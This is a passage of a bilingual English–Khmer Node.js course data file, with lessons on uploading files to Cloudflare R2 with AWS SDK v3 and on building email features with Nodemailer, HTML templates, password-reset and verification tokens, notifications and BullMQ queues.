      "summary": "Cloud object storage stores files as objects within buckets identified by keys. Modern cloud providers (AWS S3, Cloudflare R2, MinIO, Google Cloud Storage) support the S3-compatible API standard. Node.js applications use the `@aws-sdk/client-s3` library to programmatically upload, retrieve, and delete files via secure HTTPS requests.",
      "tip": "Use MinIO locally via Docker to test S3-compatible cloud uploads on your development machine without incurring cloud bills.",
      "objective": "Understand S3-compatible object storage concepts: buckets, keys, and access policies.",
      "expectedOutcome": "Readiness to integrate any S3-compatible cloud storage provider into Node.js.",
      "codeSnippet": "// S3 Object Storage Concept:\n//\n// Endpoint: https://<account_id>.r2.cloudflarestorage.com\n// Bucket:   \"my-enterprise-bucket\"\n// Key:      \"avatars/64f1a2b3-avatar.webp\"\n//\n// Client Upload Request -> Node.js API -> S3 PutObjectCommand -> Cloudflare R2 / AWS S3\n// Web Browser <- Cloudflare CDN Edge (https://cdn.myapp.com/avatars/64f1a2b3-avatar.webp)"
    },
    {
      "id": "M19-11",
      "number": "11",
      "title": "Cloudflare R2",
      "khmerTitle": "ការ Upload ឯកសារទៅ Cloudflare R2 ដោយប្រើ AWS SDK v3",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Cloudflare R2 is an S3-compatible object storage service that charges zero egress bandwidth fees, making it exceptionally cost-effective for web applications. Using `@aws-sdk/client-s3`, files processed into memory buffers by Multer are streamed directly to R2 buckets via `PutObjectCommand`.",
      "tip": "Cloudflare R2 has zero data egress fees! Serving 10TB of images per month costs $0 in bandwidth compared to hundreds of dollars on AWS S3.",
      "objective": "Stream in-memory file buffers to Cloudflare R2 using AWS SDK v3.",
      "expectedOutcome": "Production-ready cloud upload helper pushing assets to Cloudflare R2.",
      "codeSnippet": "import { S3Client, PutObjectCommand } from \"@aws-sdk/client-s3\";\nimport crypto from \"node:crypto\";\n\nconst r2 = new S3Client({\n  region: \"auto\",\n  endpoint: `https://${process.env.R2_ACCOUNT_ID}.r2.cloudflarestorage.com`,\n  credentials: {\n    accessKeyId: process.env.R2_ACCESS_KEY_ID,\n    secretAccessKey: process.env.R2_SECRET_ACCESS_KEY,\n  },\n});\n\nexport const uploadToR2 = async (fileBuffer, originalName, mimeType) => {\n  const fileKey = `uploads/${crypto.randomUUID()}-${originalName}`;\n\n  await r2.send(\n    new PutObjectCommand({\n      Bucket: process.env.R2_BUCKET_NAME,\n      Key: fileKey,\n      Body: fileBuffer,\n      ContentType: mimeType,\n    })\n  );\n\n  return `${process.env.R2_PUBLIC_DOMAIN}/${fileKey}`;\n};"
    },
    {
      "id": "M19-12",
      "number": "12",
      "title": "Image URLs",
      "khmerTitle": "ការបង្កើត និងរក្សាទុក Image URLs ក្នុង Database",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Databases should never store binary image data directly in document fields as Base64 strings, which inflates document sizes by 33% and bogs down MongoDB RAM cache. Instead, the database stores clean, relative or absolute URL path strings pointing to where the static file is served.",
      "tip": "Store relative paths (`/uploads/avatars/pic.jpg`) in the database so if your domain or CDN changes, you won't need to run database-wide migration scripts.",
      "objective": "Persist clean URL pointers in Mongoose schemas rather than raw binary data.",
      "expectedOutcome": "High-performance schema storing lightweight URL references to uploaded media.",
      "codeSnippet": "// 1. Mongoose Model stores only URL string\nconst userSchema = new mongoose.Schema({\n  name: String,\n  avatarUrl: {\n    type: String,\n    default: \"/images/default-avatar.png\",\n  },\n});\n\n// 2. Controller uploads file and persists URL:\nexport const updateAvatar = async (req, res, next) => {\n  try {\n    if (!req.file) throw new AppError(\"Please provide an image\", 400);\n\n    // Upload to Cloudflare R2\n    const publicUrl = await uploadToR2(req.file.buffer, req.file.originalname, req.file.mimetype);\n\n    // Persist URL in MongoDB\n    const user = await User.findByIdAndUpdate(\n      req.user._id,\n      { avatarUrl: publicUrl },\n      { new: true }\n    );\n\n    res.json({ status: \"success\", data: { avatarUrl: user.avatarUrl } });\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M19-13",
      "number": "13",
      "title": "Delete Uploaded Files",
      "khmerTitle": "ការលុបឯកសារចាស់ៗ (File Deletion & Storage Cleanup)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "When users update their avatar or delete a product, the previous image file must be deleted from storage to prevent orphaned files from accumulating. For local files, use `fs.promises.unlink()`. For cloud storage, execute an S3 `DeleteObjectCommand`. Always wrap deletions in error-safe try/catch blocks so file deletion failures do not abort database updates.",
      "tip": "Always wrap file unlinking in try/catch — if an old file is missing on disk, your API should log a warning instead of failing the user's update request.",
      "objective": "Implement automated file cleanup routines for updated or deleted resources.",
      "expectedOutcome": "Zero storage leaks from orphaned files across product and user updates.",
      "codeSnippet": "import fs from \"node:fs/promises\";\nimport path from \"node:path\";\nimport { DeleteObjectCommand } from \"@aws-sdk/client-s3\";\n\n// 1. Local filesystem deletion helper:\nexport const deleteLocalFile = async (relativeFilePath) => {\n  try {\n    const fullPath = path.resolve(relativeFilePath);\n    await fs.unlink(fullPath);\n    console.log(`Deleted local file: ${fullPath}`);\n  } catch (err) {\n    console.warn(`Warning: Could not delete local file ${relativeFilePath}: ${err.message}`);\n  }\n};\n\n// 2. Cloudflare R2 / S3 deletion helper:\nexport const deleteFromR2 = async (fileKey) => {\n  try {\n    await r2.send(new DeleteObjectCommand({\n      Bucket: process.env.R2_BUCKET_NAME,\n      Key: fileKey,\n    }));\n  } catch (err) {\n    console.error(`Failed to delete R2 object ${fileKey}:`, err);\n  }\n};"
    }
  ],
  "M20": [
    {
      "id": "M20-01",
      "number": "01",
      "title": "Email Architecture",
      "khmerTitle": "ស្ថាបត្យកម្មប្រព័ន្ធផ្ញើ Email ក្នុង Web Application",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "Sending transactional emails (password resets, welcome messages, purchase receipts) requires reliable transport architecture. Calling external SMTP servers synchronously blocks HTTP request threads, slowing response times by several seconds. Production architectures decouple email generation from delivery using asynchronous background message queues.",
      "tip": "Never `await` email delivery directly inside customer-facing HTTP requests. Offload email tasks to background workers (BullMQ/Redis) so API responses remain sub-100ms.",
      "objective": "Understand synchronous vs asynchronous email delivery architectures in Node.js.",
      "expectedOutcome": "High-performance architecture where slow SMTP handshakes never block HTTP responses.",
      "codeSnippet": "// Asynchronous Email Architecture:\n//\n// 1. Client POST /register\n// 2. Express Controller validates & saves user to MongoDB\n// 3. Controller dispatches email job to Redis Queue: emailQueue.add(\"welcome\", { email, name })\n// 4. Controller immediately returns 201 Created (<50ms!)\n// 5. Background BullMQ Worker consumes job and dispatches email via SMTP in parallel"
    },
    {
      "id": "M20-02",
      "number": "02",
      "title": "SMTP",
      "khmerTitle": "ការស្វែងយល់ពី Simple Mail Transfer Protocol (SMTP)",
      "type": "concept",
      "codeLanguage": "javascript",
      "summary": "Simple Mail Transfer Protocol (SMTP) is the internet standard communication protocol for electronic mail transmission. An SMTP client establishes an encrypted TLS connection with an SMTP relay server (e.g. Brevo, SendGrid, Amazon SES, Mailgun) on port 587 or 465, performs SASL authentication, and transmits RFC 5322 MIME messages.",
      "tip": "Do not use your personal Gmail account for production application emails! Google imposes daily sending quotas and blocks rapid programmatic requests. Use dedicated transactional providers like Brevo, Resend, or SES.",
      "objective": "Understand SMTP protocols, connection ports (587, 465), and authentication mechanisms.",
      "expectedOutcome": "Solid grasp of mail relays and production SMTP configuration.",
      "codeSnippet": "// Standard SMTP Configuration Parameters:\n// Host:     smtp-relay.brevo.com (or smtp.mailgun.org, email-smtp.us-east-1.amazonaws.com)\n// Port:     587 (STARTTLS - recommended) or 465 (SSL/TLS direct)\n// Secure:   false for 587 (upgrades via STARTTLS), true for 465\n// Auth:     User (API Key / Username) & Password (Secret Key)\n// From:     \"MyEnterprise Support <no-reply@myenterprise.com>\""
    },
    {
      "id": "M20-03",
      "number": "03",
      "title": "Nodemailer",
      "khmerTitle": "ការដំឡើង និងបង្កើត Nodemailer Transporter",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Nodemailer is the defacto standard Node.js library for email dispatch. It abstracts raw SMTP socket connections behind a simple `createTransport()` interface. A reusable transporter singleton handles connection pooling, authentication, and TLS handshakes across your application.",
      "tip": "During local development, use Mailtrap or Ethereal Email as your SMTP host to capture and preview test emails in a fake web inbox without spamming real recipients.",
      "objective": "Create and configure a robust Nodemailer transporter singleton supporting pooled connections.",
      "expectedOutcome": "Reusable mail transporter configured via environment variables.",
      "codeSnippet": "import nodemailer from \"nodemailer\";\n\nexport const transporter = nodemailer.createTransport({\n  host: process.env.SMTP_HOST,\n  port: Number(process.env.SMTP_PORT) || 587,\n  secure: process.env.SMTP_SECURE === \"true\", // true for 465, false for 587\n  auth: {\n    user: process.env.SMTP_USER,\n    pass: process.env.SMTP_PASS,\n  },\n  pool: true, // Reuse open socket connections\n  maxConnections: 5,\n  maxMessages: 100,\n});\n\n// Verify connection configuration on startup:\ntransporter.verify((error, success) => {\n  if (error) console.error(\"SMTP Connection Error:\", error);\n  else console.log(\"SMTP Transporter ready to deliver emails\");\n});"
    },
    {
      "id": "M20-04",
      "number": "04",
      "title": "Sending Emails",
      "khmerTitle": "ការផ្ញើ Email (Text & HTML Format)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Nodemailer's `sendMail()` method accepts an options object containing `from`, `to`, `subject`, `text` (fallback plaintext), and `html` (rich rendered styling). Providing both `html` and `text` alternatives ensures email accessibility on screen readers and low-bandwidth mobile clients.",
      "tip": "Always provide a `text` fallback along with `html` — emails containing only HTML without a plaintext alternative trigger spam filters on Gmail and Outlook.",
      "objective": "Send multi-part MIME emails with HTML formatting and plaintext fallbacks.",
      "expectedOutcome": "Reliable email transmission function delivering to recipient inboxes.",
      "codeSnippet": "export const sendEmail = async ({ to, subject, html, text }) => {\n  const mailOptions = {\n    from: `\"${process.env.APP_NAME}\" <${process.env.EMAIL_FROM}>`,\n    to,\n    subject,\n    text, // Plaintext version for spam filters & accessibility\n    html, // Rich HTML version\n  };\n\n  const info = await transporter.sendMail(mailOptions);\n  console.log(\"Email dispatched successfully. MessageID:\", info.messageId);\n  return info;\n};"
    },
    {
      "id": "M20-05",
      "number": "05",
      "title": "Email Templates",
      "khmerTitle": "ការបង្កើត Responsive HTML Email Templates",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "HTML emails require specialized inline CSS styles and table-based layouts because modern email clients (like Outlook and Gmail) strip out `<style>` tags, CSS Grid, and Flexbox. Using template functions or templating engines (Pug, EJS, Handlebars) allows injecting dynamic user data into responsive email templates.",
      "tip": "Use inline styles (`style=\"...\"`) on all HTML email elements. External stylesheets and `<style>` blocks are frequently ignored by email clients.",
      "objective": "Build modular, responsive HTML email templates with dynamic variable interpolation.",
      "expectedOutcome": "Clean, cross-client compatible HTML templates with inline styles.",
      "codeSnippet": "export const generateEmailTemplate = ({ title, bodyHtml, buttonText, buttonUrl }) => {\n  return `\n  <!DOCTYPE html>\n  <html>\n  <head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n  </head>\n  <body style=\"font-family: Arial, sans-serif; background-color: #f4f6f9; margin: 0; padding: 20px;\">\n    <table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n      <tr>\n        <td align=\"center\">\n          <table width=\"600\" style=\"background-color: #ffffff; border-radius: 8px; padding: 40px; box-shadow: 0 4px 6px rgba(0,0,0,0.05);\">\n            <tr>\n              <td>\n                <h1 style=\"color: #1e293b; margin-top: 0;\">${title}</h1>\n                <div style=\"color: #475569; font-size: 16px; line-height: 1.6;\">\n                  ${bodyHtml}\n                </div>\n                ${buttonUrl ? `\n                <div style=\"margin: 30px 0; text-align: center;\">\n                  <a href=\"${buttonUrl}\" style=\"background-color: #3b82f6; color: #ffffff; padding: 12px 24px; text-decoration: none; border-radius: 6px; font-weight: bold; display: inline-block;\">${buttonText}</a>\n                </div>` : \"\"}\n                <hr style=\"border: none; border-top: 1px solid #e2e8f0; margin: 30px 0;\">\n                <p style=\"color: #94a3b8; font-size: 12px; margin: 0;\">If you did not request this email, please ignore it.</p>\n              </td>\n            </tr>\n          </table>\n        </td>\n      </tr>\n    </table>\n  </body>\n  </html>`;\n};"
    },
    {
      "id": "M20-06",
      "number": "06",
      "title": "Registration Email",
      "khmerTitle": "ការផ្ញើ Welcome Email បន្ទាប់ពីចុះឈ្មោះជោគជ័យ",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "A welcome email greets new users immediately following account creation. It provides initial onboarding links, documentation references, and establishes trusted domain reputation. Triggering the welcome email from the registration controller reinforces user engagement.",
      "tip": "Fire welcome emails asynchronously without awaiting them in the registration response to keep signup latency minimal.",
      "objective": "Wire dynamic user welcome emails into the account registration lifecycle.",
      "expectedOutcome": "Automated delivery of branded onboarding emails upon registration.",
      "codeSnippet": "// services/mail.service.js\nexport const sendWelcomeEmail = async (user) => {\n  const html = generateEmailTemplate({\n    title: `Welcome to ${process.env.APP_NAME}, ${user.name}!`,\n    bodyHtml: \"<p>We're thrilled to have you on board. Explore your new dashboard and start building your projects today.</p>\",\n    buttonText: \"Go to Dashboard\",\n    buttonUrl: `${process.env.CLIENT_URL}/dashboard`,\n  });\n\n  await sendEmail({\n    to: user.email,\n    subject: `Welcome to ${process.env.APP_NAME}!`,\n    text: `Hi ${user.name}, Welcome to our platform! Log in at: ${process.env.CLIENT_URL}/login`,\n    html,\n  });\n};"
    },
    {
      "id": "M20-07",
      "number": "07",
      "title": "Password Reset Email",
      "khmerTitle": "លំហូរ Password Reset ជាមួយ Cryptographic Token",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Password reset flows generate an unguessable cryptographic token (`crypto.randomBytes(32).toString('hex')`), store a SHA-256 hash of that token in the database alongside a 10-minute expiration timestamp, and email the plaintext token inside a secure reset link. When the user clicks the link, the backend re-hashes the submitted token and verifies its validity.",
      "tip": "Never store the raw reset token in your database! Hash it with SHA-256 before saving, exactly like passwords, so a database leak doesn't permit account takeovers.",
      "objective": "Implement a secure password reset workflow using hashed tokens and time limits.",
      "expectedOutcome": "Cryptographically sound forgot/reset password system.",
      "codeSnippet": "import crypto from \"node:crypto\";\n\n// 1. Generate reset token in User Model method:\nuserSchema.methods.createPasswordResetToken = function () {\n  const resetToken = crypto.randomBytes(32).toString(\"hex\");\n\n  // Hash token before saving to database\n  this.passwordResetToken = crypto\n    .createHash(\"sha256\")\n    .update(resetToken)\n    .digest(\"hex\");\n\n  // Token expires in 10 minutes\n  this.passwordResetExpires = Date.now() + 10 * 60 * 1000;\n\n  return resetToken; // Return unhashed token to send via email\n};\n\n// 2. Controller sends reset link:\nconst resetUrl = `${process.env.CLIENT_URL}/reset-password?token=${resetToken}`;"
    },
    {
      "id": "M20-08",
      "number": "08",
      "title": "Verification Email",
      "khmerTitle": "ការផ្ទៀងផ្ទាត់អាសយដ្ឋាន Email (Email Verification)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "Email verification ensures that users actually own the email address they registered with. Until verified, sensitive application capabilities (like posting public content or making payments) are restricted. Upon clicking the verification link, the backend updates `isEmailVerified: true` and invalidates the single-use verification token.",
      "tip": "Set `isVerified: false` by default in your user schema. Include verification status checks in protected route middleware where verified emails are mandatory.",
      "objective": "Build an email verification system with single-use confirmation tokens.",
      "expectedOutcome": "Account verification pipeline preventing registration with fake or typoed emails.",
      "codeSnippet": "// GET /api/v1/auth/verify-email?token=<token>\nexport const verifyEmail = async (req, res, next) => {\n  try {\n    const hashedToken = crypto\n      .createHash(\"sha256\")\n      .update(req.query.token)\n      .digest(\"hex\");\n\n    const user = await User.findOne({\n      emailVerificationToken: hashedToken,\n      emailVerificationExpires: { $gt: Date.now() },\n    });\n\n    if (!user) throw new AppError(\"Token is invalid or has expired\", 400);\n\n    user.isEmailVerified = true;\n    user.emailVerificationToken = undefined;\n    user.emailVerificationExpires = undefined;\n    await user.save();\n\n    res.json({ status: \"success\", message: \"Email verified successfully!\" });\n  } catch (err) {\n    next(err);\n  }\n};"
    },
    {
      "id": "M20-09",
      "number": "09",
      "title": "Notification System",
      "khmerTitle": "ស្ថាបត្យកម្មប្រព័ន្ធ Notification (In-app & Email)",
      "type": "architecture",
      "codeLanguage": "javascript",
      "summary": "Comprehensive notification architectures deliver updates across multiple channels: in-app notification bells and external channels like Email, SMS, or Push. An event-driven notification service dispatches notifications according to user preference settings (e.g. 'Email me when someone comments on my post').",
      "tip": "Store in-app notifications in MongoDB with `{ isRead: false }` so users can see a live notification badge and mark items as read.",
      "objective": "Architect a multi-channel notification service supporting user delivery preferences.",
      "expectedOutcome": "Unified notification pipeline orchestrating both database and email alerts.",
      "codeSnippet": "// models/notification.model.js\nconst notificationSchema = new mongoose.Schema({\n  recipient: { type: mongoose.Schema.Types.ObjectId, ref: \"User\", required: true },\n  actor: { type: mongoose.Schema.Types.ObjectId, ref: \"User\" },\n  type: { type: String, enum: [\"ORDER_SHIPPED\", \"COMMENT_REPLY\", \"SECURITY_ALERT\"] },\n  title: String,\n  message: String,\n  link: String,\n  isRead: { type: Boolean, default: false },\n}, { timestamps: true });\n\nexport const Notification = mongoose.model(\"Notification\", notificationSchema);"
    },
    {
      "id": "M20-10",
      "number": "10",
      "title": "Background Email Jobs",
      "khmerTitle": "ការផ្ញើ Email តាមរយៈ Background Queues (BullMQ)",
      "type": "lab",
      "codeLanguage": "javascript",
      "summary": "In high-traffic production environments, email delivery must be decoupled from web servers using asynchronous job queues like BullMQ backed by Redis. The Express API publishes email jobs to the queue instantly (<5ms). Dedicated background worker processes listen to the queue, execute SMTP transfers with automatic retries on network failure, and track delivery status.",
      "tip": "Set exponential backoff retries on email jobs (`attempts: 5, backoff: { type: 'exponential', delay: 5000 }`) so temporary SMTP glitches don't drop emails.",
      "objective": "Dispatch email delivery tasks to a Redis-backed BullMQ queue.",
      "expectedOutcome": "Zero-latency email dispatch with automated retry resilience.",
      "codeSnippet": "import { Queue } from \"bullmq\";\n\n// 1. Initialize BullMQ Queue\nexport const emailQueue = new Queue(\"email-notifications\", {\n  connection: { host: process.env.REDIS_HOST, port: Number(process.env.REDIS_PORT) },\n});\n\n// 2. Dispatch email job inside Express Controller\nexport const triggerPasswordReset = async (req, res, next) => {\n  // ... generate resetToken ...\n\n  // Offload to BullMQ with 3 retries and exponential backoff\n  await emailQueue.add(\"send-reset-email\", {\n    email: user.email,\n    token: resetToken,\n  }, {\n    attempts: 3,\n    backoff: { type: \"exponential\", delay: 3000 },\n  });\n\n  res.json({ status: \"success\", message: \"Password reset link sent to your email!\" });\n};"
    }
  ]
};
